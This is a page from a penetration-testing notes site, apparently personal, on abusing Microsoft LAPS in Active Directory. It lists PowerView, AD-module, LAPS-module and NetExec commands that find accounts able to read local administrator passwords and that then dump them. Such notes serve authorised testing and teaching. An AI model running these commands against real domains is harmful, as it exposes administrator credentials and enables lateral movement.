0xSs0rZ
  • Hello World
  • Whoami
  • Pentest
    • Recon
      • Tools
      • Information Gathering
      • OSINT
        • Tools
        • Emails
        • Dark Web Exposure
        • Database Leak - Credential stuffing
        • Code Search (Gitlab / Github)
        • Credentials in git repos
        • GitHub - finding vulnerabilities
        • API Leaks
        • Social Media
        • Credentials in YouTube Videos
        • Metadata and Hidden infos
      • Whois
      • Google Dorks
      • Git Dorks
      • Cloud
      • DNS Subdomain Enumeration
      • Virtual Host
      • Fingerprinting / Crawling
      • Host Discovery
    • Protocols
      • Port Scan
      • IDS IPS AV Evasion
      • Common Ports
      • MindMap
      • DNS (53)
      • FTP (21)
      • IMAP POP3 (110, 143, 993, 995)
      • IPMI (623 UDP)
      • Kerberos (88)
      • LDAP (389)
      • MSSQL (1433)
      • MySQL (3306)
      • NFS (2049, 111)
      • Oracle TNS (1521, 1522-1529, 1748)
      • RDP (3389)
      • R-Services (512,513,514)
      • RSYNC (873)
      • SMB (445, 139) / RPC
      • SMTP (25, 465)
      • SNMP (10161, UDP 161)
      • SQLite
      • SSH (22)
      • WinRM (5985, 5986)
      • WMI (135)
    • Brute force
      • Default Credentials
      • Password lists
      • Username lists
      • Kraken - All-in-One Tool
      • Bypass IP Blocking
      • Hydra - Basics
      • Web login
      • FTP Bruteforce
      • O365 Bruteforce
      • POP3 Bruteforce
      • RDP Bruteforce
      • SMB Bruteforce
      • SMTP Bruteforce
      • SSH Bruteforce
      • WinRM Bruteforce
    • Shells
      • Web Shell
      • Bind and Reverse Shell
      • TTY Upgrade
    • File Transfer
      • Upload
      • Download - Exfiltration
      • Encryption
    • Web attacks
      • Methodology & Academy
      • OWASP Top 10
      • Avoid Aggressive Scanning
      • Web Enumeration
      • Fuzzing
      • Bypass 403 / 401
      • Registration Form
      • Email Verification Bypass
      • Email injections
      • Phone Number Injection
      • Login Forms Attacks
        • Bypass Authentication
        • Login Brute Force
        • Stay Logged In
        • PHP Type Juggling
      • Bypass Captcha
      • OAuth Misconfiguration
      • 2FA / OTP
      • Bypass 302
      • Password Reset
      • SQL Injection
      • NoSQL injection
      • LDAP Injection
      • XSS
      • SSI / ESI Injection
      • CSP Bypass
      • File Inclusion LFI / RFI
      • File Upload Attacks
      • Command Injection
      • Markdown injection
      • XPath Injection
      • HTTP Verb Tampering
      • HTTP Header Exploitation
      • HTTP Request Smuggling
      • Price / Checkout Manipulation Methods
      • Testing Credit Cards
      • Cookies Misconfiguration
      • Basic HTTP Authentification
      • JWT Token
      • IDOR
      • XXE / XSLT
      • SSTI
      • CSTI
      • SSRF
      • CSRF
      • CORS
      • Open Redirection
      • CSPT
      • Relative Path Overwrite, RPO
      • CRLF Injection
      • JSON Attack
      • Prototype Pollution
      • Web Mass Assignment
      • Web Cache
      • Clickjacking
      • Tabnabbing
      • Race Conditons
      • WAF Bypass
      • CMS
      • Django
      • Flask / Werkzeug
      • Tomcat (8080)
      • Tomcat CGI
      • Nginx
      • IIS
      • Exchange / OWA
      • GitLab
      • Jenkins
      • Splunk
      • Elasticsearch
      • PRTG Network Monitor
      • osTicket
      • ColdFusion
      • Nagios
      • Webmin
      • Slack
      • Moodle
      • Jira
      • Magento
      • Prestashop
      • Docker
    • API
      • OWASP API Top 10
      • Checklist
      • API Discovery / Reco
      • Sensitive Data (API Key, JWT token, etc.) Exposed
      • Postman Usage
      • ZAP Scanner
      • Swagger UI
      • REST API
      • Improper Asset Management
      • Email Enumeration
      • Authentication Bruteforce
      • JWT Token
      • Insecure UUID
      • Mass Assignment
      • Server Side Parameter Pollution
      • IDOR
      • JSON Injection
      • GraphQL
      • Tools & Scanners
      • Resources
    • Public Exploit
      • Search for CVE PoC
      • Convert line breaks from DOS to Linux
      • 7 zip
      • Adobe Acrobate Reader
      • Aiohttp
      • Angular
      • AnyDesk
      • Apache Active MQ
      • Apache Camel
      • Apache OFBiz
      • Apache Struts
      • Apache Traffic Control
      • Axis IP Camera
      • Cacti
      • Chamilo elearning
      • Check Point
      • Cisco
      • Citrix
      • Cleo File Transfer
      • CyberPanel
      • D-Link
      • F5 Big-IP
      • Froxlor
      • Fortinet
      • GeoServer
      • Ghostscript
      • Gitea
      • GLPI
      • Gogs
      • Grafana
      • Ivanti
      • Keycloak
      • Laravel
      • Mitel MiCollab
      • MobileIron
      • MOVEit Transfer
      • Navidrome
      • Next.js
      • Node.js
      • Nostromo
      • NVMS 1000
      • OpenNetAdmin
      • Oracle PeopleSoft
      • Oracle Weblogic
      • Palo Alto
      • Pandora
      • PDF.js
      • pfSense
      • PHP
      • phpMyAdmin
      • Prestashop
      • Roundcube
      • rsync
      • SolarWinds
      • Spring Framework
      • SQLPad
      • Squid Proxy
      • SuiteCRM
      • Symfony
      • TeamViewer
      • TP Link
      • VMWare
      • Wazuh
      • Winrar
      • YesWiki
      • Zabbix
      • Zimbra
      • ZoneAlarm AV/Firewall
      • ZoneMinder
    • External Pentest
    • Internal Pentest
      • Tools
      • Methodology & Cheatsheet
      • Basic Windows Commands
      • Network Attacks
      • LLMNR NBT-NS Poisoning
      • ADIDNS Spoofing
      • TimeRoast
      • Users Identification
      • Password Policy
      • Password Spray
      • LDAP Pass Back Attack
      • Reconaissance
        • Bloodhound
        • Enumeration from Windows Host
        • Enumeration from Linux Host
      • Microsoft Office & Outlook
      • Microsoft SharePoint
      • Windows Exploit
      • Print Spooler
      • LOL Bins
      • Security Controls
      • Network Shares
      • RDWA
      • Kerberoast
      • Misconfiguration
      • Pre-Created Computer Accounts
      • Privileged Access
      • ACL
      • Privilege escalation
      • SAM & LSA secrets
      • NTLM Hashes
      • LSASS secrets
      • AD CS
      • DPAPI
      • gMSA
      • Bypass Powershell Execution Policy
      • Disable / Remove AV Defender and Firewall
      • Kerberos Double Hop Problem
      • SCCM
      • AD FS
      • Trustee and Resource Delegation
      • LAPS
      • DCSync
      • NTDS secrets
      • Domain Password Audit Tools
      • Trusts
      • Persistence
      • Tiering
      • Detection
    • Privilege Escalation
      • Find specific file
      • Linux
        • Tools
        • Linux PrivEsc MindMap
        • Basics Commands
        • Basics - EoP Checklist
        • Environment Enum
        • Services & Internals Enum
        • Writable files / directories
        • /etc/passwd & /etc/shadow
        • Credentials Hunting
        • Path Abuse
        • Wildcard Abuse
        • Escaping Restricted Shells
        • SUID/SGID
        • Sudo Rights Abuse
        • Privileged Groups
        • Capabilities
        • Vulnerable Services
        • Cron Job Abuse
        • Kubernetes
        • Logrotate
        • Miscellaneous Techniques
        • Kernel Exploits
        • Shared Libraries
        • Shared Object Hijacking
        • Python Library Hijacking
        • su bruteforce
        • Hardening Linux
      • Windows
        • Tools
        • Cheatsheet
        • Enumeration
        • Credentials Hunting
        • User Privileges
        • Group Privileges
        • User Account control (UAC)
        • Weak Permissions
        • Kernel / Drivers Exploits
        • Vulnerable Services
        • Exploit CVE
        • DLL Hijacking
        • Citrix Breakout
        • RDWeb Breakout
        • Interacting with Users
        • Pillaging
        • Miscellaneous Techniques
        • Windows Server
        • Windows Desktop Versions
        • Windows Processes
        • MSI Files
        • NTLM elevation of privilege
        • From Local Admin to NT AUTHORITY\SYSTEM
      • Docker Escape / Breakout
    • Post Exploitation
      • Covering Tracks - Linux
      • Pivot, Tunneling and Port Forwarding
      • Lateral Movement
        • Pass the Hash (PtH)
        • Pass the Ticket (PtT) - Windows
        • Pass the Ticket (PtT) - Linux
        • Fileless Lateral Movement
        • DCOM
      • Gather credentials and more
        • Credentials on Host
        • Password managers, Teamviewer, Outlook, etc.
        • Microsoft Teams Cookies
        • Browser cookies
        • Linux post exploitation
        • Screenshots, clipboard
        • IIS Credentials
        • Azure AD / Entra ID
        • MSOL (Microsoft Online Services) account
        • SCOM credentials
        • Cisco phone system
      • Exfiltration
      • Resources
    • Cracking
      • Hashes
      • Files - Encrypted
      • Blurred image, pdf, etc
    • Thick Client Pentest
    • Wifi Pentest
    • Mobile Pentest
    • Configuration Audit
    • Code Analysis
    • Tools
      • Arsenal - Cheatsheet
      • Burp
      • Browser Extensions
      • Evil-WinRM
      • Internal Pentest Tools Pre Compiled
      • Metasploit
      • Mimikatz
      • NetExec - CME
      • PowerView
      • Rubeus
      • SQLMAP
      • Vulnerability Scanners
      • Collaborator, Web Hook, etc.
    • Search Engines
    • Cheatsheets
    • Note Keeping / Reporting / Admin Stuff
  • Cloud
    • Cloud VM
    • Enumeration
    • SSRF / RCE
    • Azure
    • AWS
    • GCP
    • Kubernetes
    • Tools
  • Antivirus Evasion - Defender
    • Mindmap
    • Defender Module for PowerShell
    • Static Analysis
    • Dynamic Analysis
    • AMSI Bypass
    • Process Injection
    • Open-Source Software
    • User Access Control (UAC)
    • AppLocker
    • LOLBAS / LOLDrivers / LOLESXi
    • PowerShell ConstrainedLanguage Mode, CLM
    • VBScript
    • Bypass all Powershell security features (AMSI,CLM)
    • Bypass AV Payload / Shells
    • Find Folder Exclusions
    • Resources
  • EDR BYPASS
    • Approches for Evasion
    • Tools
    • Obfuscation
    • EDR Killer
    • BYOVD
    • Spoof Command Line Arguments
    • Blind Spots
    • Living Off Security Tools / LOTTunels
    • Process Hollowing
    • Process Injection - Reverse Shell
    • Payload Creation
    • Shellcode Loader
    • MalDev
    • Malware Testing Lab
    • Resources
  • Red Team
    • OpSec / Anonymity
    • Initial Access
    • Infrastructure (phishing, C2, redirector)
    • C2
    • EDR / AV Bypass
    • Physical Penetration Testing
    • Resources
  • CTF
    • OSINT
    • Forensic
      • PCAP Analysis - Wireshark
      • DNS
      • Active Directory - GPO
      • Rubber Ducky
      • Memory Analysis
      • Disk Analysis
      • Extract Data / File Carving
      • Metadata
      • BinWalk
      • Audio
      • PNG Images
    • Cryptography
      • Tools
      • GPG
      • RSA
      • ECB / CBC
      • Esoteric Programming Language
      • One Time Pad
      • Baconian Cipher
      • ROT-13 / Caesar
      • Morse Code
      • XOR
      • Substitution
      • Vigenere
    • Steganography
      • Methods
      • Tools
Powered by GitBook
On this page
  • Users who can read LAPS passwords
  • OUs where LAPS is in use along with users who can read the passwords in clear text
  • Read LAPS Passwords
  • LAPSDumper
  • NXC
  • SharpLAPS

Was this helpful?

  1. Pentest
  2. Internal Pentest

LAPS

On a computer, if LAPS is in use, a library AdmPwd.dll can be found in the C:\Program Files\LAPS\CSE\

Users who can read LAPS passwords

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

OUs where LAPS is in use along with users who can read the passwords in clear text

# LAPS Module
Import-Module .\AdmPwd.PS.psd1
Find-AdmPwdExtendedRights -Identity OUDistinguishedName

# AD Module
.\Get-LapsPermissions.ps1

Read LAPS Passwords

# PowerView
Get-DomainObject-Identity<targetmachine$>| select -ExpandProperty ms-mcs-admpwd

# AD Module
Get-ADComputer -Identity <targetmachine> -Properties ms-mcs-admpwd | select -ExpandProperty ms-mcs-admpwd

# LAPS Module
Get-AdmPwdPassword -ComputerName <targetmachine>

LAPSDumper

NXC

If the default administrator name is not administrator add the user after the option --laps name

nxc smb <ip> -u user-can-read-laps -p pass --laps

nxc winrm <ip> -u user-can-read-laps -p pass --laps

SharpLAPS

PreviousTrustee and Resource DelegationNextDCSync

Last updated 4 months ago

Was this helpful?

LogoGitHub - n00py/LAPSDumper: Dumping LAPS from PythonGitHub
LogoGitHub - swisskyrepo/SharpLAPS: Retrieve LAPS password from LDAPGitHub